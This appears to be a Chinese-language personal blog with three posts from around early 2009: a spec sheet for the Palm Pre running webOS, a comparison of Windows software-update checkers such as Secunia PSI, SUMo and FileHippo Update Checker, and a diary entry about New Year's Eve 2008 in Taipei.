希望這次 Palm webOS 能夠重新奪回 PDA 的市場,好好跟 Windows Mobile、iPhone 還有聲勢浩大的 Android 一戰啊...

Operating systemPalm webOS
Network spec3G EVDO Rev A
Display3.1-inch touch screen with a vibrant 24-bit color 320x480 resolution HVGA display
KeyboardPhysical QWERTY keyboard
EmailMicrosoft OutlookR email with MicrosoftR Direct Push Technology
POP3/IMAP (Yahoo, Gmail, AOL, etc).

MessagingIntegrated IM, SMS, and MMS
GPSBuilt-in GPS
Digital camera3 megapixel camera with LED flash and extended depth of field
SensorsAmbient light, accelerometer, and proximity
Media formats supportedAudio Formats: MP3, AAC, AAC+, AMR, QCELP, WAV
Video Formats: MPEG-4, H.263, H.264
Image Formats: GIF, Animated GIF, JPEG, PNG, BMP
Wireless connectivityWi-Fi 802.11b/g with WPA, WPA2, 801.1x authentication
BluetoothR 2.1 + EDR with A2DP stereo Bluetooth support
Memory8GB of user storage (~7.4GB user available)
USB mass storage support
Phone as laptop modemBluetooth tethering
ConnectorMicroUSB connector with USB 2.0 Hi-Speed
Headphone jack3.5mm stereo
PalmR Touchstone
charging dock
Compatible
DimensionsWidth: 59.5mm (2.3 inches)
Height: 100.5mm (3.9 inches)
Thickness: 16.95mm (0.67 inches)
Weight135 grams (4.76 ounces)

2009/01/05

Software Update Monitor 軟體更新偵測

Google Operating System 那邊看到的一些軟體更新檢查程式。
一些用過之後感覺不賴。順便加上一些自己之前用過的心得。


Secunia Personal Software Inspector (PSI)

http://secunia.com/vulnerability_scanning/personal/



自動檢查電腦內的哪些軟體有安全漏洞,並且直接提供 Solution。
只要點 Download Solution 或者 Solution Wizard 就會直接告知你要如何修正。

一些免安裝的軟體也會照樣掃瞄,常駐在背景定期掃瞄感覺應該不錯。
不過進階模式掃瞄花了我八分多鐘...速度上有點慢。
需要安裝,但是暴力解開可直接執行。
可以預見的是之後或許是要收費的...

優點:免費軟體、資訊完整、含安全性資訊、未安裝的軟體執行檔也會檢查
缺點:掃瞄速度慢、只對安全漏洞掃瞄、未列出一般軟體更新


SUMo

http://www.kcsoftwares.com/index.php?sumo



之前就有在用這套,目前持續有更新。有正體中文介面!

更新列表清楚,功能完整,可以直接從清單中選擇更新及執行軟體。
可以切換快速掃瞄及完整掃瞄,掃瞄的速度快,但檢查更新的速度稍慢是唯一的大缺點。

且有部分軟體的版本會誤判。例如 ACDSee Pro 與 ACDSee 的版本號。
軟體的更新是顯示官方網站及各家搜尋引擎,而無直接下載點,需要進階使用者才能習慣。
需要安裝,但可以解開直接免安裝執行。

優點:免費、軟體小、免安裝、功能完整
缺點:無直接下載更新位置、檢查更新速度慢


UpdateStar

http://client.updatestar.com



介面使用 Office 2007 Ribbon Control,喜歡這種 Style 的人應該會覺得漂亮。
免費版功能有限制,不會檢查安全性漏洞,只會檢查安裝的軟體有無新版。
需要安裝,會寫入機碼。不過暴力解開 MSI 還是可以正常運作。

優點:介面漂亮、網站提供軟體 Pack 下載、版本標示清楚
缺點:免費版功能限制、無安全性資訊


FileHippo.com Update Checker

http://www.filehippo.com/updatechecker/



掃瞄電腦中安裝的軟體有無新版。
有免安裝版,檔案小,掃瞄速度快。
程式下載是從 FileHippo.com 自己的伺服器,而不是官方網站。
但在 FileHippo.com 上面版本還算齊全,在一些特殊情況需要抓舊版的話是個好地方。

優點:免費、免安裝、軟體小、簡單使用、網頁呈現結果、可下載舊版本
缺點:偵測軟體數量少、下載位置非官方


AppGet

http://www.app-get.com/



免安裝,檔案極小,速度極快!
辨識電腦中已安裝的軟體有無更新。
唯一可惜的是目前已經一年多沒更新,程式與網站的整合功能也無法使用。
且有部分軟體的版本會誤判。例如 ACDSee Pro 與 ACDSee 的版本號。

優點:免費、免安裝、大小極小、掃瞄速度快
缺點:久未更新、網路功能維修中、一些軟體版本誤判

2009/01/01

2008 年最後一天

早上去新店把 case 完工。忍受睡意聽完天馬行空的要求跟幻想。中午被請吃一頓,下午回公司準備繼續弄下一個案子。

結果沒啥心情弄,看到一半開始整理 screen 的環境,順便聽到 case 接洽的人似乎對我們相當不滿,而且還想要 ooxx##**,整個聽到還滿火的,不過結束了就算了。希望「下次」還能跟他們「交流」一番。結果在公司留到了六點多才弄個段落。orz

等了很久的車,在坐捷運跟坐車睡得一蹋糊塗,也塞車塞得一蹋糊塗。吃了充滿愛心、豐盛的晚餐,接著去散個步。感覺最詭異的一次一年最後一天。不過後來還滿開心的。

結束之後搭捷運散步,燈火通明的捷運感覺一點都不像是在 12 點。越接近台北車站,上車的人越多,不知道到了台北車站會擠成怎樣...最後還好人還不多。搭到中山站再慢慢走回家。

享受晚上一個人的感覺很不賴。

Welcome, 2009.